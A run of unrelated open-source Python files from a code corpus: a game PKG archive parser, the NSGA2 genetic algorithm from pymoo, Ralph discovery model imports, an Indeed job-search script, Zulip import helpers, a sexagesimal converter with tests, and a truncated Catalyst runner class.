index = c["_resource_index"]
break
if index is None or start_headers is None:
raise ValueError("Missing required context key")
return start_headers + (index * FileEntry.sizeof()) + offset
return result
FileEntry = Struct(
asset_id=Construct_AssetId,
start_offset=Int32ul,
end_offset=Int32ul,
)
PKGHeader = Struct(
header_size=Int32ul,
data_section_size=Int32ul,
file_entries=PrefixedArray(Int32ul, FileEntry),
)
PKG = Struct(
_header_size=Skip(1, Int32ul),
_data_section_size_address=Tell,
_data_section_size=Skip(1, Int32ul),
_num_files=Rebuild(Int32ul, construct.len_(construct.this.files)),
_start_headers=Tell,
_skip_headers=Seek(lambda ctx: ctx._num_files * FileEntry.sizeof(), 1),
_align=AlignTo(128),
_files_start=Tell,
_update_header_size=Pointer(
0x0,
Rebuild(Int32ul, lambda ctx: ctx._files_start - Int32ul.sizeof()),
),
files=Array(
construct.this._num_files,
Aligned(8, FocusedSeq(
"item",
_resource_index=Computed(lambda ctx: ctx["_index"]),
actual_start_offset=Tell,
start_offset=Pointer(header_field("start_offset"),
Rebuild(Int32ul, lambda ctx: ctx.actual_start_offset)),
end_offset=Pointer(header_field("end_offset"),
Rebuild(Int32ul, lambda ctx: ctx.start_offset + len(ctx.item.data))),
item_size=Computed(lambda ctx: ctx.end_offset - ctx.start_offset),
item=Struct(
asset_id=Pointer(header_field("asset_id"), Construct_AssetId),
asset_name=Computed(lambda ctx: dread_data.name_for_asset_id(ctx.asset_id)),
data=Prefixed(
Rebuild(
Computed(lambda ctx: ctx._.item_size),
construct.len_(construct.this.data),
),
GreedyBytes,
),
),
)),
),
_files_end=Tell,
_update_data_section_size=Pointer(
lambda ctx: ctx._data_section_size_address,
Rebuild(Int32ul, lambda ctx: ctx._files_end - ctx._files_start),
),
)
@dataclasses.dataclass(frozen=True)
class PkgFile:
asset_id: AssetId
data: bytes
@property
def asset_name(self) -> Optional[str]:
return dread_data.name_for_asset_id(self.asset_id)
class Pkg(BaseResource):
@classmethod
def construct_class(cls, target_game: Game) -> Construct:
return PKG
@classmethod
def parse_stream(cls, stream: typing.BinaryIO, target_game: Game) -> "Pkg":
return cls(cls.construct_class(target_game).parse_stream(stream, target_game=target_game),
target_game)
def build_stream(self, stream: typing.BinaryIO) -> bytes:
return self.construct_class(self.target_game).build_stream(self._raw, stream, target_game=self.target_game)
@property
def all_assets(self) -> typing.Iterator[PkgFile]:
for file in self.raw.files:
yield PkgFile(file.asset_id, file.data)
def get_asset(self, asset_id: NameOrAssetId) -> Optional[bytes]:
asset_id = resolve_asset_id(asset_id)
for file in self.raw.files:
if file.asset_id == asset_id:
return file.data
return None
def replace_asset(self, asset_id: NameOrAssetId, new_file: bytes):
asset_id = resolve_asset_id(asset_id)
for file in self.raw.files:
if file.asset_id == asset_id:
file.data = new_file
return
raise ValueError(f"Unknown asset id: {asset_id}")
def add_asset(self, asset_id: NameOrAssetId, new_file: bytes):
asset_id = resolve_asset_id(asset_id)
if self.get_asset(asset_id) is not None:
raise ValueError(f"Asset id already exists: {asset_id}")
self.raw.files.append(construct.Container(
asset_id=asset_id,
data=new_file,
))
def remove_asset(self, asset_id: NameOrAssetId):
asset_id = resolve_asset_id(asset_id)
for file in self.raw.files:
if file.asset_id == asset_id:
self.raw.files.remove(file)
return
raise ValueError(f"Unknown asset id: {asset_id}")
|
the-stack_0_6224 | import numpy as np
from pymoo.algorithms.genetic_algorithm import GeneticAlgorithm
from pymoo.model.individual import Individual
from pymoo.model.survival import Survival
from pymoo.operators.crossover.simulated_binary_crossover import SimulatedBinaryCrossover
from pymoo.operators.default_operators import set_if_none
from pymoo.operators.mutation.polynomial_mutation import PolynomialMutation
from pymoo.operators.sampling.random_sampling import RandomSampling
from pymoo.operators.selection.tournament_selection import TournamentSelection, compare
from pymoo.util.display import disp_multi_objective
from pymoo.util.dominator import Dominator
from pymoo.util.non_dominated_sorting import NonDominatedSorting
from pymoo.util.randomized_argsort import randomized_argsort
class NSGA2(GeneticAlgorithm):
def __init__(self, pop_size=100, **kwargs):
# always store the individual to store rank and crowding
kwargs['individual'] = Individual(rank=np.inf, crowding=-1)
# default settings for nsga2 - not overwritten if provided as kwargs
set_if_none(kwargs, 'pop_size', pop_size)
set_if_none(kwargs, 'sampling', RandomSampling())
set_if_none(kwargs, 'selection', TournamentSelection(func_comp=binary_tournament))
set_if_none(kwargs, 'crossover', SimulatedBinaryCrossover(prob_cross=0.9, eta_cross=15))
set_if_none(kwargs, 'mutation', PolynomialMutation(prob_mut=None, eta_mut=20))
set_if_none(kwargs, 'survival', RankAndCrowdingSurvival())
set_if_none(kwargs, 'eliminate_duplicates', True)
super().__init__(**kwargs)
self.tournament_type = 'comp_by_dom_and_crowding'
self.func_display_attrs = disp_multi_objective
def binary_tournament(pop, P, algorithm, **kwargs):
if P.shape[1] != 2:
raise ValueError("Only implemented for binary tournament!")
tournament_type = algorithm.tournament_type
S = np.full(P.shape[0], np.nan)
for i in range(P.shape[0]):
a, b = P[i, 0], P[i, 1]
# if at least one solution is infeasible
if pop[a].CV > 0.0 or pop[b].CV > 0.0:
S[i] = compare(a, pop[a].CV, b, pop[b].CV, method='smaller_is_better', return_random_if_equal=True)
# both solutions are feasible
else:
if tournament_type == 'comp_by_dom_and_crowding':
rel = Dominator.get_relation(pop[a].F, pop[b].F)
if rel == 1:
S[i] = a
elif rel == -1:
S[i] = b
elif tournament_type == 'comp_by_rank_and_crowding':
S[i] = compare(a, pop[a].rank, b, pop[b].rank,
method='smaller_is_better')
else:
raise Exception("Unknown tournament type.")
# if rank or domination relation didn't make a decision compare by crowding
if np.isnan(S[i]):
S[i] = compare(a, pop[a].get("crowding"), b, pop[b].get("crowding"),
method='larger_is_better', return_random_if_equal=True)
return S[:, None].astype(np.int)
class RankAndCrowdingSurvival(Survival):
def __init__(self) -> None:
super().__init__(True)
def _do(self, pop, n_survive, D=None, **kwargs):
# get the objective space values and objects
F = pop.get("F")
# the final indices of surviving individuals
survivors = []
# do the non-dominated sorting until splitting front
fronts = NonDominatedSorting().do(F, n_stop_if_ranked=n_survive)
for k, front in enumerate(fronts):
# calculate the crowding distance of the front
crowding_of_front = calc_crowding_distance(F[front, :])
# save rank and crowding in the individual class
for j, i in enumerate(front):
pop[i].set("rank", k)
pop[i].set("crowding", crowding_of_front[j])
# current front sorted by crowding distance if splitting
if len(survivors) + len(front) > n_survive:
I = randomized_argsort(crowding_of_front, order='descending', method='numpy')
I = I[:(n_survive - len(survivors))]
# otherwise take the whole front unsorted
else:
I = np.arange(len(front))
# extend the survivors by all or selected individuals
survivors.extend(front[I])
return pop[survivors]
def calc_crowding_distance(F):
infinity = 1e+14
n_points = F.shape[0]
n_obj = F.shape[1]
if n_points <= 2:
return np.full(n_points, infinity)
else:
# sort each column and get index
I = np.argsort(F, axis=0, kind='mergesort')
# now really sort the whole array
F = F[I, np.arange(n_obj)]
# get the distance to the last element in sorted list and replace zeros with actual values
dist = np.concatenate([F, np.full((1, n_obj), np.inf)]) \
- np.concatenate([np.full((1, n_obj), -np.inf), F])
index_dist_is_zero = np.where(dist == 0)
dist_to_last = np.copy(dist)
for i, j in zip(*index_dist_is_zero):
dist_to_last[i, j] = dist_to_last[i - 1, j]
dist_to_next = np.copy(dist)
for i, j in reversed(list(zip(*index_dist_is_zero))):
dist_to_next[i, j] = dist_to_next[i + 1, j]
# normalize all the distances
norm = np.max(F, axis=0) - np.min(F, axis=0)
norm[norm == 0] = np.nan
dist_to_last, dist_to_next = dist_to_last[:-1] / norm, dist_to_next[1:] / norm
# if we divided by zero because all values in one columns are equal replace by none
dist_to_last[np.isnan(dist_to_last)] = 0.0
dist_to_next[np.isnan(dist_to_next)] = 0.0
# sum up the distance to next and last and norm by objectives - also reorder from sorted list
J = np.argsort(I, axis=0)
crowding = np.sum(dist_to_last[J, np.arange(n_obj)] + dist_to_next[J, np.arange(n_obj)], axis=1) / n_obj
# replace infinity with a large number
crowding[np.isinf(crowding)] = infinity
return crowding
|
the-stack_0_6225 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Discovery models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from ralph.discovery.models_device import (
Connection,
ConnectionType,
Database,
DatabaseType,
DeprecationKind,
Device,
DeviceEnvironment,
DeviceModel,
DeviceType,
DISK_PRODUCT_BLACKLIST,
DISK_VENDOR_BLACKLIST,
LoadBalancerMember,
LoadBalancerPool,
LoadBalancerType,
LoadBalancerVirtualServer,
MarginKind,
NetworkConnection,
ReadOnlyDevice,
SERIAL_BLACKLIST,
ServiceCatalog,
UptimeSupport,
)
from ralph.discovery.models_network import (
DataCenter,
DiscoveryQueue,
Environment,
IPAddress,
IPAlias,
Network,
NetworkKind,
NetworkTerminator,
)
from ralph.discovery.models_component import (
ComponentModel,
ComponentType,
DiskShare,
DiskShareMount,
Ethernet,
EthernetSpeed,
FibreChannel,
GenericComponent,
MAC_PREFIX_BLACKLIST,
Memory,
OperatingSystem,
Processor,
Software,
SplunkUsage,
Storage,
)
from ralph.discovery.models_history import (
DiscoveryValue,
HistoryChange,
)
ASSET_NOT_REQUIRED = (
DeviceType.rack,
DeviceType.blade_system,
DeviceType.management,
DeviceType.power_distribution_unit,
DeviceType.data_center,
DeviceType.switch_stack,
DeviceType.virtual_server,
DeviceType.cloud_server,
DeviceType.unknown
)
__all__ = [
'DataCenter',
'DiscoveryQueue',
'Environment',
'IPAddress',
'IPAlias',
'MAC_PREFIX_BLACKLIST',
'Network',
'NetworkKind',
'NetworkTerminator',
'ComponentModel',
'ComponentType',
'DiskShare',
'DiskShareMount',
'Ethernet',
'EthernetSpeed',
'FibreChannel',
'GenericComponent',
'Memory',
'OperatingSystem',
'Processor',
'Software',
'SplunkUsage',
'Storage',
'DISK_PRODUCT_BLACKLIST',
'DISK_VENDOR_BLACKLIST',
'Database',
'DatabaseType',
'DeprecationKind',
'Device',
'DeviceEnvironment',
'DeviceModel',
'DeviceType',
'Connection',
'ConnectionType',
'LoadBalancerMember',
'LoadBalancerPool',
'LoadBalancerType',
'LoadBalancerVirtualServer',
'MarginKind',
'NetworkConnection',
'ReadOnlyDevice',
'SERIAL_BLACKLIST',
'ServiceCatalog',
'UptimeSupport',
'HistoryChange',
'DiscoveryValue',
'ASSET_NOT_REQUIRED',
]
# Load the plugins code
import ralph.discovery.plugins # noqa
|
the-stack_0_6226 | import os
from dotenv import find_dotenv, load_dotenv
import socket
from indeed import IndeedClient
import re
project_dir = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)
def get_ip():
return socket.gethostbyname(socket.gethostname())
# Set static user parameters
load_dotenv(find_dotenv())
indeed_pub_id = os.environ.get("INDEED_PUB_ID")
user_agent = os.environ.get("DEF_USER_AGENT")
static_params = {
'userip' : get_ip(),
'useragent' : user_agent
}
client = IndeedClient(indeed_pub_id)
# Script that pulls job search data using Indeed's api
def job_search(params):
# query and location parameters are required
if "q" not in params:
print("Please include query parameter")
return None
if "l" not in params:
print("Please include location parameter")
return None
params.update(static_params)
search_response = client.search(**params)
return search_response
def job_details(keys):
details_response = client.jobs(jobkeys = (keys))
return details_response
|
the-stack_0_6229 | import random
import requests
import shutil
import logging
import os
from typing import List, Dict, Any, Optional
from django.forms.models import model_to_dict
from zerver.models import Realm, RealmEmoji, Subscription, Recipient, \
Attachment, Stream, Message
from zerver.lib.actions import STREAM_ASSIGNMENT_COLORS as stream_colors
from zerver.lib.avatar_hash import user_avatar_path_from_ids
from zerver.lib.parallel import run_parallel
# stubs
ZerverFieldsT = Dict[str, Any]
def build_zerver_realm(realm_id: int, realm_subdomain: str, time: float,
other_product: str) -> List[ZerverFieldsT]:
realm = Realm(id=realm_id, date_created=time,
name=realm_subdomain, string_id=realm_subdomain,
description=("Organization imported from %s!" % (other_product)))
auth_methods = [[flag[0], flag[1]] for flag in realm.authentication_methods]
realm_dict = model_to_dict(realm, exclude='authentication_methods')
realm_dict['authentication_methods'] = auth_methods
return[realm_dict]
def build_avatar(zulip_user_id: int, realm_id: int, email: str, avatar_url: str,
timestamp: Any, avatar_list: List[ZerverFieldsT]) -> None:
avatar = dict(
path=avatar_url, # Save original avatar url here, which is downloaded later
realm_id=realm_id,
content_type=None,
user_profile_id=zulip_user_id,
last_modified=timestamp,
user_profile_email=email,
s3_path="",
size="")
avatar_list.append(avatar)
def build_subscription(recipient_id: int, user_id: int,
subscription_id: int) -> ZerverFieldsT:
subscription = Subscription(
color=random.choice(stream_colors),
id=subscription_id)
subscription_dict = model_to_dict(subscription, exclude=['user_profile', 'recipient_id'])
subscription_dict['user_profile'] = user_id
subscription_dict['recipient'] = recipient_id
return subscription_dict
def build_recipient(type_id: int, recipient_id: int, type: int) -> ZerverFieldsT:
recipient = Recipient(
type_id=type_id, # stream id
id=recipient_id,
type=type)
recipient_dict = model_to_dict(recipient)
return recipient_dict
def build_realm(zerver_realm: List[ZerverFieldsT], realm_id: int,
domain_name: str) -> ZerverFieldsT:
realm = dict(zerver_client=[{"name": "populate_db", "id": 1},
{"name": "website", "id": 2},
{"name": "API", "id": 3}],
zerver_customprofilefield=[],
zerver_customprofilefieldvalue=[],
zerver_userpresence=[], # shows last logged in data, which is not available
zerver_userprofile_mirrordummy=[],
zerver_realmdomain=[{"realm": realm_id,
"allow_subdomains": False,
"domain": domain_name,
"id": realm_id}],
zerver_useractivity=[],
zerver_realm=zerver_realm,
zerver_huddle=[],
zerver_userprofile_crossrealm=[],
zerver_useractivityinterval=[],
zerver_reaction=[],
zerver_realmemoji=[],
zerver_realmfilter=[])
return realm
def build_usermessages(zerver_usermessage: List[ZerverFieldsT], usermessage_id: int,
zerver_subscription: List[ZerverFieldsT], recipient_id: int,
mentioned_users_id: List[int], message_id: int) -> int:
for subscription in zerver_subscription:
if subscription['recipient'] == recipient_id:
flags_mask = 1 # For read
if subscription['user_profile'] in mentioned_users_id:
flags_mask = 9 # For read and mentioned
usermessage = dict(
user_profile=subscription['user_profile'],
id=usermessage_id,
flags_mask=flags_mask,
message=message_id)
usermessage_id += 1
zerver_usermessage.append(usermessage)
return usermessage_id
def build_defaultstream(realm_id: int, stream_id: int,
defaultstream_id: int) -> ZerverFieldsT:
defaultstream = dict(
stream=stream_id,
realm=realm_id,
id=defaultstream_id)
return defaultstream
def build_stream(date_created: Any, realm_id: int, name: str,
description: str, stream_id: int, deactivated: bool=False,
invite_only: bool=False) -> ZerverFieldsT:
stream = Stream(
name=name,
deactivated=deactivated,
description=description,
date_created=date_created,
invite_only=invite_only,
id=stream_id)
stream_dict = model_to_dict(stream,
exclude=['realm'])
stream_dict['realm'] = realm_id
return stream_dict
def build_message(subject: str, pub_date: float, message_id: int, content: str,
rendered_content: Optional[str], user_id: int, recipient_id: int,
has_image: bool=False, has_link: bool=False,
has_attachment: bool=True) -> ZerverFieldsT:
zulip_message = Message(
rendered_content_version=1, # this is Zulip specific
subject=subject,
pub_date=pub_date,
id=message_id,
content=content,
rendered_content=rendered_content,
has_image=has_image,
has_attachment=has_attachment,
has_link=has_link)
zulip_message_dict = model_to_dict(zulip_message,
exclude=['recipient', 'sender', 'sending_client'])
zulip_message_dict['sender'] = user_id
zulip_message_dict['sending_client'] = 1
zulip_message_dict['recipient'] = recipient_id
return zulip_message_dict
def build_attachment(realm_id: int, message_id: int, attachment_id: int,
user_id: int, fileinfo: ZerverFieldsT, s3_path: str,
zerver_attachment: List[ZerverFieldsT]) -> None:
"""
This function should be passed a 'fileinfo' dictionary, which contains
information about 'size', 'created' (created time) and ['name'] (filename).
"""
attachment = Attachment(
id=attachment_id,
size=fileinfo['size'],
create_time=fileinfo['created'],
is_realm_public=True,
path_id=s3_path,
file_name=fileinfo['name'])
attachment_dict = model_to_dict(attachment,
exclude=['owner', 'messages', 'realm'])
attachment_dict['owner'] = user_id
attachment_dict['messages'] = [message_id]
attachment_dict['realm'] = realm_id
zerver_attachment.append(attachment_dict)
def process_avatars(avatar_list: List[ZerverFieldsT], avatar_dir: str, realm_id: int,
threads: int, size_url_suffix: str='') -> List[ZerverFieldsT]:
"""
This function gets the avatar of the user and saves it in the
user's avatar directory with both the extensions '.png' and '.original'
Required parameters:
1. avatar_list: List of avatars to be mapped in avatars records.json file
2. avatar_dir: Folder where the downloaded avatars are saved
3. realm_id: Realm ID.
"""
def get_avatar(avatar_upload_list: List[str]) -> int:
avatar_url = avatar_upload_list[0]
image_path = avatar_upload_list[1]
original_image_path = avatar_upload_list[2]
response = requests.get(avatar_url + size_url_suffix, stream=True)
with open(image_path, 'wb') as image_file:
shutil.copyfileobj(response.raw, image_file)
shutil.copy(image_path, original_image_path)
return 0
logging.info('######### GETTING AVATARS #########\n')
logging.info('DOWNLOADING AVATARS .......\n')
avatar_original_list = []
avatar_upload_list = []
for avatar in avatar_list:
avatar_hash = user_avatar_path_from_ids(avatar['user_profile_id'], realm_id)
avatar_url = avatar['path']
avatar_original = dict(avatar)
image_path = ('%s/%s.png' % (avatar_dir, avatar_hash))
original_image_path = ('%s/%s.original' % (avatar_dir, avatar_hash))
avatar_upload_list.append([avatar_url, image_path, original_image_path])
# We don't add the size field here in avatar's records.json,
# since the metadata is not needed on the import end, and we
# don't have it until we've downloaded the files anyway.
avatar['path'] = image_path
avatar['s3_path'] = image_path
avatar_original['path'] = original_image_path
avatar_original['s3_path'] = original_image_path
avatar_original_list.append(avatar_original)
# Run downloads parallely
output = []
for (status, job) in run_parallel(get_avatar, avatar_upload_list, threads=threads):
output.append(job)
logging.info('######### GETTING AVATARS FINISHED #########\n')
return avatar_list + avatar_original_list
def process_uploads(upload_list: List[ZerverFieldsT], upload_dir: str,
threads: int) -> List[ZerverFieldsT]:
"""
This function downloads the uploads and saves it in the realm's upload directory.
Required parameters:
1. upload_list: List of uploads to be mapped in uploads records.json file
2. upload_dir: Folder where the downloaded uploads are saved
"""
def get_uploads(upload: List[str]) -> int:
upload_url = upload[0]
upload_path = upload[1]
upload_path = os.path.join(upload_dir, upload_path)
response = requests.get(upload_url, stream=True)
os.makedirs(os.path.dirname(upload_path), exist_ok=True)
with open(upload_path, 'wb') as upload_file:
shutil.copyfileobj(response.raw, upload_file)
return 0
logging.info('######### GETTING ATTACHMENTS #########\n')
logging.info('DOWNLOADING ATTACHMENTS .......\n')
upload_url_list = []
for upload in upload_list:
upload_url = upload['path']
upload_s3_path = upload['s3_path']
upload_url_list.append([upload_url, upload_s3_path])
upload['path'] = upload_s3_path
# Run downloads parallely
output = []
for (status, job) in run_parallel(get_uploads, upload_url_list, threads=threads):
output.append(job)
logging.info('######### GETTING ATTACHMENTS FINISHED #########\n')
return upload_list
def process_emojis(zerver_realmemoji: List[ZerverFieldsT], emoji_dir: str,
emoji_url_map: ZerverFieldsT, threads: int) -> List[ZerverFieldsT]:
"""
This function downloads the custom emojis and saves in the output emoji folder.
Required parameters:
1. zerver_realmemoji: List of all RealmEmoji objects to be imported
2. emoji_dir: Folder where the downloaded emojis are saved
3. emoji_url_map: Maps emoji name to its url
"""
def get_emojis(upload: List[str]) -> int:
emoji_url = upload[0]
emoji_path = upload[1]
upload_emoji_path = os.path.join(emoji_dir, emoji_path)
response = requests.get(emoji_url, stream=True)
os.makedirs(os.path.dirname(upload_emoji_path), exist_ok=True)
with open(upload_emoji_path, 'wb') as emoji_file:
shutil.copyfileobj(response.raw, emoji_file)
return 0
emoji_records = []
upload_emoji_list = []
logging.info('######### GETTING EMOJIS #########\n')
logging.info('DOWNLOADING EMOJIS .......\n')
for emoji in zerver_realmemoji:
emoji_url = emoji_url_map[emoji['name']]
emoji_path = RealmEmoji.PATH_ID_TEMPLATE.format(
realm_id=emoji['realm'],
emoji_file_name=emoji['name'])
upload_emoji_list.append([emoji_url, emoji_path])
emoji_record = dict(emoji)
emoji_record['path'] = emoji_path
emoji_record['s3_path'] = emoji_path
emoji_record['realm_id'] = emoji_record['realm']
emoji_record.pop('realm')
emoji_records.append(emoji_record)
# Run downloads parallely
output = []
for (status, job) in run_parallel(get_emojis, upload_emoji_list, threads=threads):
output.append(job)
logging.info('######### GETTING EMOJIS FINISHED #########\n')
return emoji_records
|
the-stack_0_6232 | '''
Created on Jul 25, 2017
@author: Daniel Sela, Arnon Sela
'''
def sixty(scalar, trailsign=False, ):
'''
;+
; NAME:
; SIXTY()
; PURPOSE:
; Converts a decimal number to sexagesimal.
; EXPLANATION:
; Reverse of the TEN() function.
;
; CALLING SEQUENCE:
; X = SIXTY( SCALAR, [ /TrailSign ] )
;
; INPUTS:
; SCALAR -- Decimal quantity.
; OUTPUTS:
; Function value returned = real vector of three elements,
; sexagesimal equivalent of input decimal quantity. Double
; precision if the input is double, otherwise floating point.
; By default, a negative number is signified by making the first non-zero
; element of the output vection negative, but this can be modified with
; the /TrailSign keyword.
;
; OPTIONAL INPUT KEYWORD:
; /TrailSign - By default, SIXTY() returns a negative sign in the first
; nonzero element. If /TrailSign is set, then SIXTY() will return
; always return a negative sign in the first element, even if it is
; zero
; PROCEDURE:
; Mostly involves checking arguments and setting the sign.
;
; EXAMPLE:
; If x = -0.345d then sixty(x) = [0.0, -20.0, 42.0]
; and sixty(x,True) = [-0.0, 20.0, 42.0]
;-
Changes History:
Added dd range limit - force positive value by complementing to dd_range
prevent adding negative sign to value of 0
'''
if not isinstance(scalar, float):
scalar = float(scalar)
ss = abs(3600.0*scalar)
mm = abs(60.0*scalar)
dd = abs(scalar)
result = [0, 0, 0]
result[0] = int(dd)
result[1] = int(mm-60.0*result[0])
result[2] = ss-3600.0*result[0] - 60.0*result[1]
if scalar < 0:
if trailsign:
result[0] = -result[0]
else:
if result[0] != 0:
result[0] = -result[0]
elif result[1] != 0:
result[1] = -result[1]
elif result[2] != 0:
result[2] = -result[2]
return result
if __name__ == '__main__':
import unittest
from astropy.coordinates import Angle
from astropy import units as u
class TestSixtyMethod(unittest.TestCase):
def test_1(self):
self.assertEqual(sixty(-0.5), [0, -30, 0.0])
def test_2(self):
self.assertEqual(sixty(0.5), [0, 30, 0.0])
def test_3(self):
self.assertEqual(sixty(10.49999), [10, 29, 59.96399999999994])
def test_4(self):
dms = Angle(-0.5, unit=u.deg).dms
result = list(dms._asdict().values())
self.assertEqual(result, [-0.0, -30.0, -0.0])
unittest.main()
|
the-stack_0_6233 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 18 22:18:27 2021
@author: galin
"""
import string
import requests
from bs4 import BeautifulSoup
import pandas as pd
import time
from tqdm.auto import tqdm
# stock exchange :
# AMEX - American Stock Exchange,
# LSE - London Stock Exchange,
# NASDAQ - NASDAQ Stock Exchange,
# NYSE - New York Stock Exchange,
# SGX - Singapore Stock Exchange
# TSX - Toronto Stock Exchange
def get_indexes (stocks_exchange):
def get_stock_indexes(stock_exchange_name):
base_url="http://eoddata.com/stocklist"
letters_upper_case = list(string.ascii_uppercase)
digits = [x for x in range(10)]
if stock_exchange_name in ['LSE', 'SGX']:
symbols_tabs = digits + letters_upper_case
else:
symbols_tabs = letters_upper_case
df_index_description = pd.DataFrame({'Code':[],
'Name':[]})
urls = [base_url + "/{}/{}.htm".format(stock_exchange_name, letter)
for letter in symbols_tabs ]
html_contents = (requests.get(url).text for url in urls)
with tqdm(total=len(urls)) as pbar:
for html_content in html_contents:
soup = BeautifulSoup(html_content, "lxml")
tables = soup.find_all(lambda tag: tag.name=='table')
read_table = pd.read_html(str(tables[5]))
temp = read_table[0][['Code','Name']]
if(set(temp['Code']).isdisjoint(set(df_index_description['Code']))):
df_index_description = pd.concat([df_index_description
, read_table[0][['Code','Name']]
])
time.sleep(1)
pbar.update(1)
return df_index_description['Code']
df_index_description = pd.DataFrame()
for stocks in stocks_exchange:
df_index_description = pd.concat([df_index_description
, get_stock_indexes(stocks)])
return df_index_description[0].tolist()
|
the-stack_0_6238 | import os
from click import echo
from tmt.steps.provision.base import ProvisionBase
from tmt.utils import SpecificationError
class ProvisionLocalhost(ProvisionBase):
""" Localhost provisioner """
def __init__(self, data, step):
super(ProvisionLocalhost, self).__init__(data, step)
self._prepare_map = {
'ansible': self._prepare_ansible,
'shell': self._prepare_shell,
}
def execute(self, *args, **kwargs):
self.run(self.join(args))
def _prepare_ansible(self, what):
""" Run ansible on localhost """
# Playbook paths should be relative to the metadata tree root
playbook = os.path.join(self.step.plan.run.tree.root, what)
# Prepare verbose level based on the --debug option count
verbose = ' -' + self.opt('debug') * 'v' if self.opt('debug') else ''
# Run ansible playbook against localhost, in verbose mode
ansible = (
f'ansible-playbook{verbose} -c local -i localhost, {playbook}')
# Force column width to 80 chars, to mitigate issues with too long
# lines due to indent. Column width is the same as with libvirt plugin.
columns = 'stty cols 80'
self.run(f'sudo sh -c "{columns}; {ansible}"')
def _prepare_shell(self, what):
""" Run ansible on localhost """
# Set current working directory to the test metadata root
self.run(what, cwd=self.step.plan.run.tree.root)
def prepare(self, how, what):
""" Run prepare phase """
try:
self._prepare_map[how](what)
except AttributeError as e:
raise SpecificationError(
f"Prepare method '{how}' is not supported.")
|
the-stack_0_6239 | from typing import ( # isort:skip
Any, Callable, Dict, Mapping, Optional, Tuple, Union # isort:skip
) # isort:skip
from abc import ABC, abstractmethod
from collections import OrderedDict
import torch
from torch import nn
from torch.utils.data import DataLoader, DistributedSampler
from catalyst import utils
from catalyst.utils.tools.typing import (
Criterion, Device, Model, Optimizer, Scheduler
)
from .callback import Callback, LoggerCallback
from .experiment import _Experiment
from .state import _State
class _Runner(ABC):
"""
Abstract class for all runners inherited from
"""
experiment_fn: Callable = _Experiment
state_fn: callable = _State
def __init__(
self,
model: Model = None,
device: Device = None,
):
"""
Args:
model (Model): Torch model object
device (Device): Torch device
"""
# main
self._model: Model = model
self._device: Device = device
self.experiment: _Experiment = None
self.state: _State = None
self.callbacks: OrderedDict[str, Callback] = None
self.loggers: OrderedDict[str, LoggerCallback] = None
self.loaders: OrderedDict[str, DataLoader] = None
# additional
self._check_run = False
@property
def model(self) -> Model:
"""
Returns the runner's model instance
"""
return self._model
@model.setter
def model(self, value: Union[Model, Dict[str, Model]]):
"""
Setter for the runner's model'
"""
if isinstance(value, nn.Module):
model = value
elif isinstance(value, dict):
values_are_models = all(
[isinstance(v, nn.Module) for v in value.values()]
)
if not values_are_models:
raise TypeError(
"Invalid dict value type, must be `torch.nn.Module`"
)
model = value
else:
raise TypeError(
f"Invalid value type "
f"must be `torch.nn.Module` or `Dict[str, torch.nn.Module]` "
f"got '{type(value)}'"
)
if self._device is not None:
model: Model = utils.maybe_recursive_call(
model, "to", device=self._device
)
self._model = model
@property
def device(self) -> Device:
"""
Returns the runner's device instance
"""
return self._device
@device.setter
def device(self, value: Device):
"""
Setter for the runner's device'
"""
if isinstance(value, (str, torch.device)):
self._device = value
else:
raise TypeError(
f"Invalid value type "
f"must be `str` or `torch.device` "
f"got '{type(value)}'"
)
if self._model is not None:
self._model = utils.maybe_recursive_call(
self._model, "to", device=self._device
)
@abstractmethod
def forward(self, batch: Mapping[str, Any], **kwargs) -> Mapping[str, Any]:
"""
Forward method for your Runner
Args:
batch: Key-value batch items
**kwargs: kwargs to pass to the model
"""
pass
def _get_experiment_components(
self, stage: str = None
) -> Tuple[Model, Criterion, Optimizer, Scheduler, Device]:
"""
Inner method for children's classes for model specific initialization.
As baseline, checks device support and puts model on it.
:return:
"""
utils.set_global_seed(self.experiment.initial_seed)
model = self.experiment.get_model(stage)
criterion, optimizer, scheduler = \
self.experiment.get_experiment_components(model, stage)
model, criterion, optimizer, scheduler, device = \
utils.process_components(
model=model,
criterion=criterion,
optimizer=optimizer,
scheduler=scheduler,
distributed_params=self.experiment.distributed_params,
device=self.device
)
return model, criterion, optimizer, scheduler, device
def _prepare_for_stage(self, stage: str):
utils.set_global_seed(self.experiment.initial_seed)
migrating_params = {}
if self.state is not None:
migrating_params.update(
{
"step": self.state.step,
"epoch": self.state.epoch
}
)
utils.set_global_seed(self.experiment.initial_seed)
self.model, criterion, optimizer, scheduler, self.device = \
self._get_experiment_components(stage)
utils.set_global_seed(self.experiment.initial_seed)
self.state = self.state_fn(
stage=stage,
model=self.model,
device=self.device,
criterion=criterion,
optimizer=optimizer,
scheduler=scheduler,
**self.experiment.get_state_params(stage),
**migrating_params
)
utils.set_global_seed(self.experiment.initial_seed)
callbacks = self.experiment.get_callbacks(stage)
loggers = utils.process_callbacks(
OrderedDict(
[
(k, v) for k, v in callbacks.items()
if isinstance(v, LoggerCallback)
]
)
)
callbacks = utils.process_callbacks(
OrderedDict(
[
(k, v) for k, v in callbacks.items()
if not isinstance(v, LoggerCallback)
]
)
)
self.state.loggers = loggers
self.loggers = loggers
self.callbacks = callbacks
def _prepare_for_epoch(self, stage: str, epoch: int):
pass
# @TODO: too complicated -> rewrite
def _run_event(self, event: str, moment: Optional[str]):
fn_name = f"on_{event}"
if moment is not None:
fn_name = f"{fn_name}_{moment}"
# before callbacks
if self.state is not None:
getattr(self.state, f"{fn_name}_pre")()
if self.loggers is not None and moment == "start":
for logger in self.loggers.values():
getattr(logger, fn_name)(self.state)
# running callbacks
if self.callbacks is not None:
for callback in self.callbacks.values():
getattr(callback, fn_name)(self.state)
# after callbacks
if self.loggers is not None and \
(moment == "end" or moment is None): # for on_exception case
for logger in self.loggers.values():
getattr(logger, fn_name)(self.state)
if self.state is not None:
getattr(self.state, f"{fn_name}_post")()
def _batch2device(self, batch: Mapping[str, Any], device: Device):
output = utils.any2device(batch, device)
return output
def _run_batch_train_step(self, batch: Mapping[str, Any]):
self.state.output = self.forward(batch)
@torch.no_grad()
def predict_batch(
self, batch: Mapping[str, Any], **kwargs
) -> Mapping[str, Any]:
"""
Run model for a batch of elements
WARN: You should not override this method. If you need specific model
call, override forward() method
Args:
batch: Key-value batch items
**kwargs: kwargs to pass to the model
Returns:
model output key-value
"""
batch = self._batch2device(batch, self.device)
